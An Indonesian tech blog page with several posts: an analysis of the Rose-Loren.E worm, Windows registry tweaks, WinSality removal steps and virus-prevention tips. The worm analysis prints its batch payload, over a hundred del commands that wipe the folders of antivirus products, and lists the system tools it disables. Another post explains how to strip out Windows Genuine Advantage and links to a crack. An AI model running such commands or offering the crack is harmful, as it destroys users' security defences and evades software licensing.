Showing posts with label System Tips. Show all posts
Showing posts with label System Tips. Show all posts

Virus : Rose-Loren.E:’Rose’ Ada karena ‘Cinta’

Rose-Loren.E. Tidak selamanya dunia malware itu terkesan hitam dan jahat. Karena Rose-Loren dan salah satu variannya yang di bahas kali ini lebih mengesankan kepiluan serta rasa kesedihan yang dirasakan oleh pembuatnya. Jika bunga mawar umumnya mencirikan perasaan cinta, Rose-Loren membuat bunga mawar sebagai tanda kedatangannya.
Rose-Loren.E
A. Info Malware
Nama: Rose-Loren.E
Asal: Indonesia
Ukuran File: 91.7 KB (93,961 bytes)
Packer : Unknown
Pemrograman : Visual Basic
Icon : Folder Windows
Tipe : Worm
B. Tentang Malware
Sepertinya ini adalah hasil dari modifikasi dari source terdahulu karena sudah cukup lama kami mendapatkan variant dari Rose-Loren. eSetelah di unpack, worm ini berukuran 216 KB (221,696 bytes). Saat worm ini aktif di memory, komputer akan terasa lambat karena proses Rose-Loren.E menyita resource yang cukup besar.
C. Companion/File yang dibuat
Saat aktif, worm akan mencari setiap drive yang ditemukan dan membuat file/folder antara lain sebagai berikut:
  • Membuat file yang merupakan file induk/host dari worm, yaitu
    C:\WINDOWS\system32\[5 buah bilangan acak]\lsass.exe dan
    C:\WINDOWS\system32\[5 buah bilangan acak]\svchost.exe
  • Membuat juga file dengan nama EpIoler dan autoexec.bat di folder yang sama seperti di atas, dan isinya adalah:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    del /f /q /s  C:\ESET\*.* >nul
    del /f /q /s  C:\antivi~1\*.* >nul
    del /f /q /s  C:\antivi~2\*.* >nul
    del /f /q /s  C:\antiviru\*.* >nul
    del /f /q /s  C:\avg\*.* >nul
    del /f /q /s  C:\kasper~1\*.* >nul
    del /f /q /s  C:\kasper~2\*.* >nul
    del /f /q /s  C:\mcafee\*.* >nul
    del /f /q /s  C:\mcafee.com\agent\*.* >nul
    del /f /q /s  C:\mcafee.com\*.* >nul
    del /f /q /s  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s  C:\mcafee~1\*.* >nul
    del /f /q /s  C:\msav\*.* >nul
    del /f /q /s  C:\norman\*.* >nul
    del /f /q /s  C:\norton~1\*.* >nul
    del /f /q /s  C:\norton~2\*.* >nul
    del /f /q /s  C:\pav\*.* >nul
    del /f /q /s  C:\pccill~1\*.* >nul
    del /f /q /s  C:\iolo\*.* >nul
    del /f /q /s  C:\progra~1\ESET\*.* >nul
    del /f /q /s  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s  C:\progra~1\avg\*.* >nul
    del /f /q /s  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s  C:\progra~1\mcafee\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\agent\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\\*.* >nul
    del /f /q /s  C:\progra~1\McAfee.com\VSO\*.* >nul
    del /f /q /s  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s  C:\progra~1\norman\*.* >nul
    del /f /q /s  C:\progra~1\norton~1\*.* >nul
    del /f /q /s  C:\progra~1\norton~2\*.* >nul
    del /f /q /s  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:h  C:\ESET\*.* >nul
    del /f /q /s /a:h  C:\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\antiviru\*.* >nul
    del /f /q /s /a:h  C:\avg\*.* >nul
    del /f /q /s /a:h  C:\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\mcafee\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\msav\*.* >nul
    del /f /q /s /a:h  C:\norman\*.* >nul
    del /f /q /s /a:h  C:\norton~1\*.* >nul
    del /f /q /s /a:h  C:\norton~2\*.* >nul
    del /f /q /s /a:h  C:\pav\*.* >nul
    del /f /q /s /a:h  C:\pccill~1\*.* >nul
    del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:h  C:\iolo\*.* >nul
    del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:R  C:\ESET\*.* >nul
    del /f /q /s /a:R  C:\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\antiviru\*.* >nul
    del /f /q /s /a:R  C:\avg\*.* >nul
    del /f /q /s /a:R  C:\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
    del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.Rose-Loren.E - HTMLRose-Loren.E - View Source
  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.Rose-Loren.E - Flash DiskRose-Loren.E - Autorun
D. Hasil Infeksi
Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:
Rose-Loren.E - Logon
Text yang dirandom adalah:
  • Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
  • Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
  • Mahkota kemanusiaan ialah rendah hati
  • Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
  • Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
  • Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
  • Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
  • Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
  • Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
  • Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
  • Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
  • Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
  • Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
  • Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
  • Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
  • Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
  • Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
  • Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
  • Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
  • Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
  • Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
  • Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
  • Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
  • Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
  • Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
  • Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
  • Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
  • Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
  • Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
  • Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
  • Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
  • Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
  • Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
  • Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
  • Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
  • Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.
Worm juga menghilangkan beberapa menu pada Folder Options.
Rose-Loren.E - Folder Options
Payload lainnya adalah merubah tampilan properties pada My Computers.
Rose-Loren.E - System
Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.
  • Regedit.exe
  • Msconfig.exe
  • taskmgr.exe
  • ntvdm.exe
  • rstrui.exe
  • EnableExtensions
  • FolderContentsInfoTip
  • NoRun
  • NoFind
  • DisableCurrentUserRun
  • HideFileExt
  • FolderSizeTip
  • ShowFullPathAddress
  • ShowFullPath
  • Disable SafeMode
  • Disable Show Hidden and Super Hidden files.
Worm juga akan membuat startup dengan nama WinUp dan RsWin.

Sumber : virusindonesia.com
Posted on 12:08 PM / 2 comments / Read More

Optimalisasi windows dengan registry editor

Seperti yang telah kita ketahui bersama bahwa registry editor atau umumnya lebih dikenal dengan regedit memegang peranan layaknya urat syaraf dalam serangkaian tulang punggung pada manusia. Apabila ia terawat maka tubuh tempat ia bernaung juga akan sehat dan terhindar dari berbagai gangguan yang berbahaya. Begitu pula dengan registry editor apabila anda merawatnya dengan baik maka bisa dipastikan hal tersebut bisa berpengaruh sangat positif bagi kondisi system windows kita. Namun dibalik semua itu registry editor juga menyimpan banyak kegunaan yang bisa kita custem guna mendukung apa yang kita kerjakan sesuai dengan kehendak kita. Dengan catatan caranya benar dan hati-hati. Ya memang agak beresiko karena apabila kita salah melakukannya sedikit saja bukan malah menjadikan windows kita menjadi system yang mumpuni malah membuatnya jadi gila atau crash sehingga ia akan jadi terganggu dalam bekerja.disini kita akan melakukan sedikit tips dan trik agar windows kita dari yang standard dan gitu-gitu aja menjadi suatu system yang berbeda dan lebih daripada yang lain.

- Mematikan fitur animasi pada windows
Trik ini bisa dicoba pada PC yang benar-benar mempunyai kecepatan yang lambat. Kita bisa mematikan fungsi animasi pada windows dan mengaturnya apakah mau diaktifkan atau tidak. Biarlah windows tanpa animasi tapi dengan begitu kecepatannya bisa meningkat. Caranya edit key pada registry editor seperti dibawah
Key :HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
Jenis Value : String Value
Nama Value : MinAnimate
Data Value : 1 = untuk mematikan animasi dan 0 = untuk mengaktifkan.

- Merapikan tampilan Notepad
Sering kali saat kita menggunakan notepad kita harus menggeser scroll kekanan atau kekiri pada bawah window yang aktif untuk membaca isi dari notepad apabila berisi data yang panjang. Dengan sedikit trik ini kita bisa dengan mudah merapikan isi tampilan notepad sehingga kita tidak perlu lagi susah payah menggeser scroll bawah window untuk membaca isinya secara lengkap.Karena isi akan menata otomatis sebesar window notepad yang dibuka. Caranya edit key berikut
Key :HKEY_CURRENT_USER\Software\Microsoft\Notepad
Nama Value : fWrap
Ganti nilai 0 pad data value menjadi 1 untuk merapikan tampilan Notepad.

- Mematikan Program Not Responding otomatis
Sering kali kita dibuat menunggu apabila ada salah satu dari aplikasi yang kita jalankan ternyata Not Responding. Nah berikut merupakan trik agar program yang Not Responding tadi langsung closing/dimatikan otomatis oleh windows sehingga kita tidak perlu susah-susah mematikannya melalui task manager dan tidak menyita waktu atau mengganggu kita dalam bekerja.
Key :HKEY _USERS\DEFAULT\Control Panel\Desktop
Jenis Value : String Value
Nama Value : AutoEndTasks
Isilah nilai pada data value menjadi angka 1.

- Mempercepat Menu start
Dengan trik ini maka proses kita dapat mempercepat proses menampilkan start menu. Caranya masuk Key HKEY_CURRENT_USER\Control Panel\Desktopfolder
Jenis Value : String Value
Nama Value : MenuShowDelay
Gantilah nilai pada data value menjadi 1 untuk mempercepatnya

Semoga bermafaat =)
Posted on 11:00 PM / 3 comments / Read More

Cara membasmi virus WinSality

Ulah WinSality ini memang cukup merepotkan. Dilansir dari informasi vendor penyedia jasa antivirus mereka bahkan melansir bahwa virus WinSality memiliki beberapa varian. Varian-varian tersebut ada yang bersifat polymorphic maupun yang metamorphic. Karena kalau hanya sekedar menggandakan file ataupun bikin PC kita lemot itu mah sudah biasa. Namun apa yang dikerjakan Winsality tidak hanya merusak file-file root windows yang ada dalam C: namun semua file yang berekstensi *.exe yang ada pada semua drive juga akan terinfeksi oleh Winsality. Program-program aplikasi yang sudah terinstall sudah tidak berjalan normal sebagaimana seharusnya. Celakanya lagi apabila kita menyimpan file-file master aplikasi dimanapun drivenya maka besar kemungkinan akan turut terinfeksi juga. Dengan demikian apabila antivirus yang kita pakai berhasil detect bahwa file tersebut sudah terinfeksi dengan WinSality maka seperti kebanyakan antivirus mereka akan langsung menghapusnya dari drive kita. Meskipun tak jarang ditemui kejadian bahkan antivirus yang terinstall sudah tidak bekerja seperti biasanya.  Nah lho… lalu bagaimana dengan nasib beberapa file master aplikasi kita yang berharga :’(

Benar-benar merepotkan bukan??? Bahkan sangat merepotkan bin menjengkelkan !!!

Setelah belajar dari pengalaman juga cari informasi sana sini ternyata ada beberapa cara efektif dalam mengatasi virus Winsality ini. Untungnya lagi beberapa vendor antivirus ternama sudah mengeluarkan tools yang khusus bekerja melakukan remove pada Winsality sampai pada akar-akarnya(Tools AVG Winsality Remover download di sini ). Berikut langkah-langkahnya yang bisa dilakukan untuk menembuhkan PC yang terkena Winsality :

- Putuskan semua koneksi internet dari PC yang terinfeksi Winsality.

- Matikan System restore pada windows.

- Matikan Autorun dan default share dari PC tersebut.

- Matikan semua program aplikasi yang sedang anda buka, termasuk juga program aplikasi yang ada pada   proses startup agar proses removing Winsality berjalan lebih cepat.

- Ubahlah tools Winsality remover yang akan digunakan dari berekstensi *.exe menjadi *.cmd agar tidak terinfeksi oleh Winsality yang sudah menjalar kemana-mana.

- Lakukan scan dengan menggunakan tools tersebut.

- Restart Windows setelah proses cleaning selesai.

- Lakukan perbaikan pada registry windows yang sudah terinfeksi Winsality dengan menggunakan FixReg (download di sini).

- Extrack FixReg.rar dan jalankan registri yang ada di folder FixReg
sesuai dengan windows yang digunakan.

- Restart Windows kembali.

Periksa task manager,  regedit dsb untuk memastikan PC sudah benar-benar bersih dari WinSality.
Semoga bermanfaat =)
Posted on 12:26 PM / 1 comments / Read More

Cara Mengatasi Pesan"You may be a victim of software counterfeiting" di Windows


Cukup menjengkelkan memang saat melihat PC kesayangan kita dapat error message "You may be a victim of software counterfeiting" yang isinya bahwa O.S PC kita bukan genuine dari windows (bagi temen-temen pengguna windows neh.. yang laen minggir dulu hehe) Udah diformat mpe berapa kali pas direstart eh.. surat cinta alias error message tadi kembali muncul di pojok kanan bawah desktop.
Apakah perlu diformat ulang lagi???
hadwuwh... mpe berapa kali diformat ulang???
=(
Bahkan setelah author browse kemana-mana ada user juga yang malah sudah mahal-mahal merogoh kocek untuk membeli windows yang original eh.. malah kena juga error message kalau windowsnya bukan original. Nah lho.. yang benar yang mana? hehe
Bukan maksud hati tidak ingin menggunakan yang original dari microsoft di paman Sam sono tapi bukannya kita hidup tuh harus efektif dan efisien juga hemat =P
(tanpa ada maksud menentang Gerakan Anti Pembajakan wkwkwkwkk...)

Beberapa langkah berikut mungkin bisa temen-temen coba untuk menghilangkan message tersebut :

1. Buka Windows Explorer, akses di C:WindowsDownloaded Program Files. Dalam folder ini temukan dah hapus semua file berakhiran .WGA.
2. Masuk Safe Mode dengan menekan tombol F8 saat PC sedang booting.
    Dalam Safe Mode, masuk ke folder berikut ini:
    - C:WindowsSystem32 (ganti nama file wgatray.exe menjadi wgatrayold.exe)
    - C:WindowsSystem32dllcache (ganti nama file wgatray.exe menjadi wgatrayold.exe)
    Keterangan: Dllcache berada dalam folder yang tersembunyi (hidden). Untuk menampilkannya, buka Control Panel > Folder Options, Pilih tab View, temukan checkbox Show Hidden Files and Folders, tandai.

    3. Masih dalam Safe Mode, Masuk Registry Editor:
        -  Klik Start > Run > ketik regedit dalam dialog box akhiri dengan klik [OK].
        -  Dalam Registry Editor, arahkan pada string berikut:
          HKEY_Local_Machine\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WGALOGON

          - Klik Kanan > Export folder WGALOGON (langkah ini perlu dilakukan untuk membackup registry)
          - Setelah seluruh folder selesai diexport, hapus folder WGALOGON tersebut.
          - Restart.
        Kalau masih bandel dan muncul kembali message "You may be a victim of software counterfeiting" kita pakai jurus jitu kita yang kedua. Langkah ini kita akan menggunakan sedikit bantuan software yang akan menghilangkan message tersebut hanya dengan sekali klik saja. Menarik bukan ?!? Pada dasarnya cara kerja dari software tersebut hampir sama dengan langkah-langkah yang telah kita bahas bersama di atas. Hanya saja kita sama sekali tidak perlu repot-repot harus masuk registry windows.
        Sekali lagi "Just by one click!" dan semua beres ^^
        Temen-temen bisa mendownloadnya dan ikuti intruksinya.
        Selamat mencoba...

        Download software crack Vista & XP Genuine
        Ziddu
        Mediafire
        Posted on 11:13 AM / 2 comments / Read More

        Free Download Ebook : Cara Membuat Shortcut Shutdown dan Restart di Desktop

        Dengan membuat shortcut pada desktop proses melakukan shutdown akan semakin cepat. Karena sobat kedai info hanya melakukan sekali klik saja dan pufh… komputer akan langsung shutdown tanpa kita harus repot-repot klik start menu lalu klik lagi tombol shutdown... 
        Penasaran????? Klik aja di sini untuk mendownload ebook ini. Praktis dan mudah untuk di prakatekkan. Cocok sekali bagi pemula dan kita yang mau mengenal windows lebih jauh =)
        Posted on 12:02 PM / 1 comments / Read More

        Cara Mengganti Nama dan Menyembunyikan Recycle Bin di Desktop


        Adakalanya sobat kedai info merasa bosan dengan tampilan desktop yang hanya itu-itu saja. Mulai dari skin dan icon yang sudah di customize menggunakan beberapa program yang banyak beredar. Tapi…. Ahh!!! tetap aja semuanya masih menawarkan itu-itu saja perubahannnya. Nah.. sobat kedai info kali ini bagaimana kalau kita bisa menyematkan nama kita sendiri ke icon recycle bin atau bahkan kita bisa menyembunyikan recycle bin dari desktop kita (tenang-tenang kita masih bisa menampilkannya kembali kok di kemudian hari.

        Di sini kita akan sedikit mengutak-atik registry windows kita. Ya mungkin bagi kita yang masih asing dengan registry??? Apa itu registry? Registry atau registry editor bagi windows ibarat tulang urat syaraf dalam tubuh windows itu sendiri. Kalau kita bisa mengoptimalkannya alhasil laptop/komputer kesayangan kita bisa menjadi mesin yang luar biasa kemampuannya ( ups lebay hehee… map =P) namun hati-hati ya jangan sampai salah perlakuan bisa-bisa malah komputer kesayangan kita malah sakit dan tak bangun kembali ( nah lho… tenang-tenang jangan panik semua pasti ada obatnya ^^!

        Langkah pertama yang perlu dilakukan adalah membuat salinan atau back up registry kita dulu sebelum kita melakukan modifikasi pada registry komputer kita. Langkah-langkahnya :
        - Klik menu [Run] pada start menu
        - Ketik [regedit]
        - Klik menu [File] lalu pilih [Export]
        - Simpan file registry kita di drive yang kita suka dan klik [Save]
        Mudah bukan ? Dari file registry ini dikemudian hari kita bisa menggunakannya apabila terjadi system crash.

        Untuk merubah nama pada recylcle bin tidaklah semudah merubah nama pada shortcut hanya dengan melakukan klik kanan dan merubah namanya pada umumnya. Kita harus menggunakan registry windows untuk melakukannya. Masuklah registry editor melalui menu Run pada start menu seperti pada langkah sebelumnya. Berikut adalah hal yang harus kita lakukan.
        Klik Key : HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
        Jenis Value : String Value
        Nama Value : (Default)
        Data Value : “Kantong Sampah”

        Nah ubahlah nama yang berwarna merah di atas sesuai kehendak kita tanpa tanda petik.
        Untuk menyembunyikan recycle bin setelah masuk pada registry editor ikuti langkah berikut :
        Klik Key : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\{645FF040-5081-101B-9F08-00AA002F954E}
        Hapus Key {645FF040-5081-101B-9F08-00AA002F954E} di atas maka icon shortcut akan hilang dari desktop kita. Untuk memunculkannya kembali kita tinggal menempatkan kembali Key {645FF040-5081-101B-9F08-00AA002F954E} ditempat awalnya dengan membuat key yang baru.

        Selamat mencoba.

        Download posting di atas dengan format pdf klik di sini.




        Posted on 11:50 AM / 0 comments / Read More

        Tips menjaga dan optimalisasi computer dari serangan virus


        Sering kali kita merasa geram “arghhhhhh……..” ato “adduh…. Kena virus deh!”. Padahal besok sudah deadline laporan, skripsi, tugas dan sebagainya. Ya memang sangat menjengkelkan saat-saat komputer kesayangan kita ngadat karena serangan virus yang tidak bermoral, meski  terkadang serangannya hanya berupa nebeng print out welewh2... (emangnya nih printer moyang loe hoohooo =P)
        Meski kita sudah sangat berhati-hati bisa-bisanya si virus tembus juga infeksi komputer kita. Berbagai antivirus juga sudah kita pasang demi mendukung security pada komputer kita, namun apa daya ^^. Sebenarnya kita bisa mencegah jauh-jauh hari kalau kita mengetahui bagaimana dan darimana potensi serangan virus itu berasal. “Bawa payung sebelum hujan” yah itu mungkin istilah yang cocok untuk topik yang sedang kita bicarakan saat ini.
        Beberapa tips dan trik berikut mungkin patut dicoba untuk mencaga komputer anda dari serangan virus yang sporadis (lebay xixixi...). Oke langsung saja daripada banyak omong nti jadi basi lagi hehhee  =D
        1.    Memasang Antivirus
        Memasang antivirus ini sudah lazim dilakukan dan merupakan wajib hukumnya untuk dilakukan demi menjaga sistem keamanan komputer kesayangan kita. Namun pernahkah anda mengeluhkan antivirus anda, misal “wah kurang sakti nih antivirus masak gak detect sama  sekali padahal tadi di komputernya si A detect da virusnya”. Sebenarnya semua jenis antivirus itu baik meski tidak bisa dipungkiri masing-masing brand punya kelebihan dan kekurangan masing-masing. pertimbangan ialah sudah sepantasnya kita memilih yang sesuai dengan kapasitas komputer kita. Benar-benar harus kita pertimbangkan minimum requirement dari antivirus yang kita mau pakai. Jangan sampai udah beli mahal-mahal ternyata sesudah di install eh malah komputer kita malah jadi lemott <apa bedanya ma kena virus kalo malah jadi ngadat kayak kena virus hehe..) . lakukanlah update database virus secara rutin dan scanning secara berkala pada computer kita.

        2.    Mematikan fungsi autorun pada computer
        Langkah ini layak untuk anda coba karena banyak sekali varian virus yang  mmanfaatkan fasilitas plug and play pada OS. Windows. Kalau anda tidak jeli maka tak hayal malah virus yang terinstall pada komputer kesayangan anda. Ada beberapa cara untuk melakukannya antara lain ialah dengan menekan tombol Alt+Shift saat anda menancapkan flashdisk ke komputer anda. Tekan agak lama hingga window autoplay tidak keluar lagi. Cara kedua ialah melalui Pengaturan Konfigurasi di Windows yaitu melalui Group Policy [GPEDIT.MCS], caranya:
        > Klik menu [Start]
        > Klik [Run]
        > Ketik GPEDIT.MSC pada kolom RUN ,lalu OK
        >Setelah muncul layar Group Policy klik User Configuration , pilih Administrative Templates.
        > Pilih System, lalu cari Turn Off Autoplay.
        > Klik kanan pada Turn Off Autoplay, lalu pilih Properties, lalu pilih Disabled.
        > Klik Apply, lalu OK.
        > Restart komputer.
        3.    Hindari browsing situs-situs gituan

        Nah, ini merupakan nasihat yang sangat penting bagi anda yang sampai detik ini masih suka berkunjung ke situs-situs gituan. Selain berdosa anda tidak akan tahu kalau dari situs-situs gituan banyak sekali terpasang link-link jebakan yang berujung pada terdownloadnya file-file malware, trojan, atau worm. Dengan memanfaatkan tingkat antusiasme dari user pada beberapa tulisan-tulisan yang membuat mereka berpikir panjang untuk mengkliknya, pembuat virus akan berlomba-lomba bagaimana agar virus yang sudah mereka buat bisa menginfeksi komputer si korban(user). Jadi saran penulis bertaubatlah dan segera hentikan aktifitas anda yang sering mengakses situs-situs gituan.

        4.    Belilah dan gunakan software yang berlisensi resmi
        Membeli software yang resmi berarti anda telah mensukseskan gerakan anti pembajakan di dunia. Disamping anda akan mendapatkan software yang berlisensi anda juga akan terbebas dari potensi terkena file-file yang bersifat merugikan sistem komputer anda (virus). Karena apabila anda menggunakan produk bajakan biasanya akan disediakan  fake serial number baik yang diperoleh dari generate pada keygen, patching, ataupun cracking yang berpotensi besar terinfeksi file-file merugikan sistem. Kalau emang terpaksa pakai yang tidak berlisensi maka pastikan benar-benar aman buat sistem di komputer anda.

        5.    Hindari kebiasaan copy-paste file yang berlebihan saat anda browsing di warnet.
        Kebiasaan melakukan copy-paste diwarnet ternyata juga berbahaya klu anda tidak waspada. Karena terkadang bagi anda yang suka melakukannya anda tidak akan tahu bahwa isi dari folder atau file compres terisi file-file virus.  Jadi selektiflah sebelum melakukan copy-paste.


        6.    Jaga flashdisk anda dari file-file asing.
